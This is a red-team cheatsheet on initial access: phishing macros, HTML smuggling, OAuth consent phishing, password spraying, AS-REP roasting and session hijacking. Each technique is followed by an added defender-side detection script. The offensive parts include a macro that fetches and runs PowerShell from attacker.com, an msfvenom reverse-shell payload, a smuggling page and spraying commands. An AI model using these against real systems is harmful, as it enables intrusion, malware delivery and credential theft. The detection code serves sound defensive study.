Disclaimer: This cheatsheet is provided for educational and authorized security testing
purposes only. All techniques, tools, and methods described herein must be used only in environments
in which you have explicit permission to perform security assessments. The author(s) of this
cheatsheet are not responsible for any misuse or damage resulting from the application of this material.
🛬 1. Initial Access
1.1 Phishing
1.1.1 Basic Techniques
1.1.1.1 Malicious Word Macro (Maldoc)
Steps:
- Create a .docm file in Word.
- Insert a VBA macro with the following code:
Sub AutoOpen()
Dim str As String
str = "powershell -w hidden -nop -c IEX((New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1'))"
Shell str, vbHide
End Sub
- Use MSFVenom to generate the payload:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.20 LPORT=443 -f ps1 > shell.ps1
- Host the file:
python3 -m http.server 80
- Email the victim using GoPhish, King Phisher, or a manually spoofed email (e.g., using sendmail or phishery).
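Detection note for this chain (added here as a defender-side example; it is not part of the original cheatsheet): the macro above leaves a very recognisable process tree, an Office binary spawning powershell.exe with hidden-window, no-profile and download-and-execute switches. The script below scores constructed process-creation events (field names modelled on Sysmon Event ID 1 / Windows 4688; the weights and threshold are this example's own tuning values, not a vendor rule) and returns the ones matching that pattern.

```python
"""Detection example for the Office-macro-to-PowerShell chain above.

Added illustration, not code from the original cheatsheet. Scores
constructed process-creation events (parent image, image, command line)
and flags an Office process spawning a script host with
download-and-execute switches, the footprint an AutoOpen macro leaves.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Each indicator is (regex, weight). Weights are hypothetical tuning values.
INDICATORS = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),          # hidden window
    (re.compile(r"-nop(rofile)?\b", re.I), 1),                   # skip profile
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 3),         # eval of fetched text
    (re.compile(r"DownloadString|DownloadFile|Net\.WebClient", re.I), 3),
    (re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),  # base64 command
    (re.compile(r"https?://", re.I), 1),                         # remote stage
]

def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    score, reasons = 0, []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        score += 4
        reasons.append(f"{parent} spawned {image}")
    for pattern, weight in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(pattern.pattern)
    return score, reasons

def find_suspicious(events, threshold: int = 6) -> list[dict]:
    """Events whose score reaches the threshold, with the matched reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev.get("ProcessId"), "score": score, "reasons": reasons})
    return hits

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c IEX((New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/shell.ps1'))"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File C:\\scripts\\backup.ps1"},
    {"ProcessId": 4201,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit)
```

Only the first event crosses the threshold; the scheduled backup script and the print-spooler helper Word spawns score too low. In practice the parent/child pair alone is worth alerting on at low severity, with the command-line indicators raising it.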
1.1.1.2 HTML Smuggling (Modern bypass)
<!-- Save as smuggler.html -->
<script>
const blob = new Blob(["...payload content..."], { type: 'application/octet-stream' });
const link = document.createElement("a");
link.href = URL.createObjectURL(blob);
link.download = "Invoice.exe";
link.click();
</script>
- Minify and obfuscate with tools like HTMLMinifier or Obfuscator.io.
- Host on trusted-looking domain using services like Netlify, GitHub Pages, etc.
- Deliver via spoofed email.
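Defender-side note, added as an example that is not part of the original cheatsheet: because the file is assembled in the browser, a mail gateway or proxy never sees an attachment, so the useful static signal is the JavaScript idiom itself (Blob or msSaveOrOpenBlob, createObjectURL, a download attribute, a programmatic click, often atob for a base64 payload). The scanner below extracts script blocks from an HTML document and reports those indicators plus any executable filename named in the download attribute. The sample pages are constructed; the indicator names are this example's own.

```python
"""Static triage for the HTML-smuggling pattern shown above.

Added example, not from the original cheatsheet. Extracts <script>
contents and looks for client-side file assembly plus a forced download.
Minified or lightly obfuscated pages still expose these API names unless
they are string-split, so this is a first-pass filter, not a verdict.
"""
import re
from html.parser import HTMLParser

DOWNLOAD_APIS = {
    "Blob": re.compile(r"\bnew\s+Blob\s*\(", re.I),
    "createObjectURL": re.compile(r"createObjectURL\s*\(", re.I),
    "msSaveOrOpenBlob": re.compile(r"msSaveOrOpenBlob\s*\(", re.I),
    "download-attr": re.compile(r"\.download\s*=", re.I),
    "programmatic-click": re.compile(r"\.click\s*\(\s*\)", re.I),
    "base64-decode": re.compile(r"\batob\s*\(", re.I),
}
RISKY_EXT = (".exe", ".scr", ".js", ".vbs", ".hta", ".iso", ".img", ".lnk", ".docm", ".xlsm")
FILENAME = re.compile(r"""\.download\s*=\s*["']([^"']+)["']""", re.I)

class ScriptExtractor(HTMLParser):
    """Collect the text of every <script> element."""
    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def analyze_html(html: str) -> dict:
    """Indicators found in the page's scripts and an overall smuggling verdict."""
    parser = ScriptExtractor()
    parser.feed(html)
    body = "\n".join(parser.scripts)
    hits = [name for name, rx in DOWNLOAD_APIS.items() if rx.search(body)]
    names = FILENAME.findall(body)
    risky = [n for n in names if n.lower().endswith(RISKY_EXT)]
    assembles = "Blob" in hits or "msSaveOrOpenBlob" in hits   # file built client-side
    forces = "download-attr" in hits and "programmatic-click" in hits  # download without user action
    return {
        "indicators": hits,
        "filenames": names,
        "risky_filenames": risky,
        "smuggling": (assembles and forces) or bool(risky),
    }

# Constructed samples: a smuggling page and a harmless image-preview page.
SMUGGLER = """<html><body><script>
const blob = new Blob([atob("TVqQAAMAAAAEAAAA")], { type: 'application/octet-stream' });
const link = document.createElement("a");
link.href = URL.createObjectURL(blob);
link.download = "Invoice.exe";
link.click();
</script></body></html>"""

BENIGN = """<html><body><script>
const input = document.getElementById("avatar");
input.addEventListener("change", () => {
  const url = URL.createObjectURL(input.files[0]);
  document.getElementById("preview").src = url;
});
</script></body></html>"""

if __name__ == "__main__":
    print("smuggler:", analyze_html(SMUGGLER))
    print("benign:  ", analyze_html(BENIGN))
```

Legitimate "export to file" features use the same Blob/download/click sequence, so the filename-type check and detonation in a sandbox are what separate them from a delivery page; the scanner is meant to route a message for that deeper inspection, not to block on its own.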
1.1.2 Advanced Techniques
1.1.2.1 Consent Phishing (Microsoft OAuth Abuse)
- Register a malicious app in Azure: add the User.Read, Mail.Read, or Files.Read.All scope.
- Craft URL:
https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=<malicious_app_id>&response_type=code&redirect_uri=https://attacker.com/callback&scope=Files.Read.All+offline_access
- Victim authorizes → you receive token → access cloud data (via Microsoft Graph API).
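Defender-side note, added as an example that is not part of the original cheatsheet: a consent-phishing app leaves a grant record in the tenant, so the durable detection is auditing consent grants rather than the login URL. The script below scores constructed grant records (shape loosely modelled on the Microsoft Graph oauth2PermissionGrant object plus publisher details, but the field names, allowlist and severity rules are this example's own) and ranks user-consented grants of mail/file scopes to unapproved or unverified apps highest.

```python
"""Consent-grant audit for the OAuth abuse described above.

Added example, not from the original cheatsheet. Grant records are
constructed; consent_type uses the Graph values "Principal" (a user
consented for themselves) and "AllPrincipals" (admin consent), the other
field names are this example's own.
"""
from datetime import datetime, timedelta, timezone

# Data-access scopes worth reviewing whenever an individual user consents to them.
HIGH_RISK_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send", "Files.Read.All",
                    "Files.ReadWrite.All", "Sites.Read.All", "Contacts.Read",
                    "MailboxSettings.ReadWrite"}
# offline_access turns a one-off login into long-lived refresh-token access.
PERSISTENCE_SCOPE = "offline_access"
# Hypothetical tenant allowlist of approved application (client) IDs.
APPROVED_APP_IDS = {"00000000-0000-0000-0000-00000000abcd"}

def assess_grant(grant: dict, now: datetime) -> dict:
    """Severity and reasons for one consent grant."""
    scopes = set(grant["scope"].split())
    risky = sorted(scopes & HIGH_RISK_SCOPES)
    reasons = []
    if grant["consent_type"] == "Principal":
        reasons.append("user-consented")
    if grant["app_id"] not in APPROVED_APP_IDS:
        reasons.append("app not on allowlist")
    if not grant["publisher_verified"]:
        reasons.append("unverified publisher")
    if risky:
        reasons.append("high-risk scopes: " + ", ".join(risky))
    if PERSISTENCE_SCOPE in scopes:
        reasons.append("offline_access (refresh token)")
    if now - grant["created"] < timedelta(days=7):
        reasons.append("granted in last 7 days")
    # Risky data scope + user consent + untrusted app is the consent-phishing signature.
    untrusted = "app not on allowlist" in reasons or "unverified publisher" in reasons
    if risky and "user-consented" in reasons and untrusted:
        severity = "high"
    elif risky or PERSISTENCE_SCOPE in scopes:
        severity = "medium"
    else:
        severity = "low"
    return {"app": grant["app_display_name"], "user": grant["principal"],
            "severity": severity, "reasons": reasons}

def audit(grants, now=None) -> list[dict]:
    """All grants assessed, highest severity first."""
    now = now or datetime.now(timezone.utc)
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted((assess_grant(g, now) for g in grants), key=lambda r: order[r["severity"]])

NOW = datetime(2025, 6, 1, tzinfo=timezone.utc)
# Constructed grants (no real tenant data).
SAMPLE_GRANTS = [
    {"app_id": "11111111-2222-3333-4444-555555555555", "app_display_name": "Invoice Viewer",
     "publisher_verified": False, "consent_type": "Principal", "principal": "alice@corp.local",
     "scope": "User.Read Files.Read.All offline_access", "created": NOW - timedelta(days=2)},
    {"app_id": "00000000-0000-0000-0000-00000000abcd", "app_display_name": "Corporate HR Portal",
     "publisher_verified": True, "consent_type": "AllPrincipals", "principal": "",
     "scope": "User.Read Mail.Read", "created": NOW - timedelta(days=400)},
    {"app_id": "66666666-7777-8888-9999-000000000000", "app_display_name": "Calendar Widget",
     "publisher_verified": True, "consent_type": "Principal", "principal": "bob@corp.local",
     "scope": "User.Read Calendars.Read", "created": NOW - timedelta(days=30)},
]

if __name__ == "__main__":
    for f in audit(SAMPLE_GRANTS, NOW):
        print(f["severity"].upper(), f["app"], f["user"], f["reasons"])
```

The preventive control is to stop users from consenting to unverified apps at all (tenant user-consent settings plus an admin consent workflow); the audit then catches grants that predate the policy and any admin-approved app whose scopes grew later.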
1.1.2.2 Phishing via Compromised Internal Account
- After breaching a low-priv user, dump their mailbox:
Export-Mailbox -Identity "user1@corp.local" -PSTFolderPath C:\outlook.pst
- Reuse reply threads to bypass user suspicion.
- Drop payloads via OneDrive links with enticing file names (Q3_Bonus.exe, UrgentInvoice.docm).
1.2 Valid Accounts
1.2.1 Basic Techniques
1.2.1.1 Password Spraying with CrackMapExec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Spring2025!' --no-bruteforce
- Use GetNPUsers.py for AS-REP Roasting:
GetNPUsers.py -no-pass CORP.LOCAL/ -usersfile users.txt -dc-ip 10.10.10.2
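Defender-side note, added as an example that is not part of the original cheatsheet: both techniques above have distinctive log shapes. A spray is one source producing logon failures for many accounts with only one or two attempts each inside a short window (the opposite of a user mistyping their own password), and AS-REP roasting is a burst of TGT requests for accounts that have pre-authentication disabled, usually asking for RC4 (encryption type 0x17) so the reply is cheap to crack offline. The detectors below run over constructed events with simplified field names (modelled loosely on Windows 4625/4771 failures and 4768 TGT requests, not their exact schema).

```python
"""Detections for the password-spray and AS-REP-roast techniques above.

Added example, not from the original cheatsheet. Event records are
constructed with this example's own field names.
"""
from collections import defaultdict
from datetime import datetime, timedelta

def detect_spray(failures, window=timedelta(minutes=30), min_users=10, max_per_user=2):
    """Sources whose failed logons cover many distinct users, few attempts each.

    failures: iterable of dicts with 'time' (datetime), 'source_ip', 'user'.
    Returns one alert per source for the first window that crosses the threshold.
    """
    by_source = defaultdict(list)
    for ev in failures:
        by_source[ev["source_ip"]].append(ev)
    alerts = []
    for src, evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:   # slide the window
                start += 1
            per_user = defaultdict(int)
            for e in evs[start:end + 1]:
                per_user[e["user"]] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                alerts.append({"source_ip": src, "users": len(per_user),
                               "first": evs[start]["time"], "last": evs[end]["time"]})
                break
    return alerts

def detect_asrep_roast(tgt_requests, min_accounts=3):
    """Sources that obtained RC4 TGT replies for several no-preauth accounts."""
    by_source = defaultdict(set)
    for ev in tgt_requests:
        if ev["pre_auth_type"] == 0 and ev["ticket_encryption"] == 0x17 and ev["result"] == "success":
            by_source[ev["source_ip"]].add(ev["user"])
    return [{"source_ip": s, "accounts": sorted(u)}
            for s, u in by_source.items() if len(u) >= min_accounts]

T0 = datetime(2025, 4, 1, 9, 0, 0)
# Constructed failures: 10.10.14.20 tries one password against 12 users in four minutes;
# 10.10.10.50 is one user retyping their own password six times.
SAMPLE_FAILURES = [
    {"time": T0 + timedelta(seconds=20 * i), "source_ip": "10.10.14.20", "user": f"user{i:02d}"}
    for i in range(12)
] + [
    {"time": T0 + timedelta(minutes=i), "source_ip": "10.10.10.50", "user": "carol"}
    for i in range(6)
]
# Constructed TGT requests: three no-preauth service accounts queried from one host.
SAMPLE_TGT = [
    {"time": T0, "source_ip": "10.10.14.20", "user": u, "pre_auth_type": 0,
     "ticket_encryption": 0x17, "result": "success"}
    for u in ("svc_backup", "svc_scan", "legacyapp")
] + [
    {"time": T0, "source_ip": "10.10.10.7", "user": "dave", "pre_auth_type": 2,
     "ticket_encryption": 0x12, "result": "success"},
]

if __name__ == "__main__":
    print(detect_spray(SAMPLE_FAILURES))
    print(detect_asrep_roast(SAMPLE_TGT))
```

The AS-REP detector also doubles as an inventory check: any account it lists has "Do not require Kerberos preauthentication" set, which is the condition to remove.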
1.2.1.2 Session Hijacking
- Use Bettercap or Evilginx to extract session cookies:
set http.proxy.sslstrip true
set http.proxy.injectjs file.js
set http.proxy.script filter-cookies.js
- Load cookie in browser via EditThisCookie extension.
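Defender-side note, added as an example that is not part of the original cheatsheet: the sslstrip-plus-injected-JS approach above depends on the application lacking HSTS and on session cookies being readable from script or sent over plain HTTP. The checker below parses constructed HTTP response headers and reports the missing defences: a Strict-Transport-Security header with a long max-age and includeSubDomains, and Secure, HttpOnly and SameSite on session cookies, with the __Host- prefix rules enforced where it is used. Header names are standard; the site and cookie values are made up.

```python
"""Response-header check for the cookie-theft / SSL-strip scenario above.

Added example, not from the original cheatsheet. Parses constructed
response headers and lists the hardening gaps an interception proxy
would exploit.
"""

def parse_set_cookie(header: str) -> dict:
    """Split a Set-Cookie value into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True
    return {"name": name.strip(), "value": value, "attrs": attrs}

def check_cookie(cookie: dict) -> list[str]:
    """Problems with one cookie's attributes."""
    a = cookie["attrs"]
    problems = []
    if "secure" not in a:
        problems.append("missing Secure (would be sent over plain HTTP after sslstrip)")
    if "httponly" not in a:
        problems.append("missing HttpOnly (readable by injected JavaScript)")
    if str(a.get("samesite", "")).lower() not in ("lax", "strict"):
        problems.append("SameSite not Lax/Strict")
    if cookie["name"].startswith("__Host-"):
        if a.get("path") != "/" or "domain" in a or "secure" not in a:
            problems.append("__Host- prefix requires Secure, Path=/ and no Domain")
    return problems

def check_hsts(headers: dict, min_age: int = 31536000) -> list[str]:
    """Problems with the Strict-Transport-Security header (headers keyed lower-case)."""
    value = headers.get("strict-transport-security")
    if value is None:
        return ["no Strict-Transport-Security header"]
    directives = {}
    for d in value.split(";"):
        k, _, v = d.strip().partition("=")
        directives[k.lower()] = v
    problems = []
    try:
        if int(directives.get("max-age", "0")) < min_age:
            problems.append("HSTS max-age below one year")
    except ValueError:
        problems.append("HSTS max-age not numeric")
    if "includesubdomains" not in directives:
        problems.append("HSTS lacks includeSubDomains")
    return problems

def audit_response(headers: list) -> dict:
    """headers: list of (name, value) pairs so repeated Set-Cookie headers survive."""
    single = {n.lower(): v for n, v in headers if n.lower() != "set-cookie"}
    findings = {"hsts": check_hsts(single), "cookies": {}}
    for n, v in headers:
        if n.lower() == "set-cookie":
            c = parse_set_cookie(v)
            findings["cookies"][c["name"]] = check_cookie(c)
    return findings

# Constructed responses: a weak one and a hardened one.
WEAK = [("Content-Type", "text/html"),
        ("Set-Cookie", "sessionid=abc123; Path=/")]
HARDENED = [("Strict-Transport-Security", "max-age=63072000; includeSubDomains; preload"),
            ("Set-Cookie", "__Host-session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax")]

if __name__ == "__main__":
    print("weak:    ", audit_response(WEAK))
    print("hardened:", audit_response(HARDENED))
```

HSTS only helps once the browser has seen the header over HTTPS (or the domain is on the preload list), which is why the check insists on a year-long max-age and includeSubDomains rather than merely on the header being present.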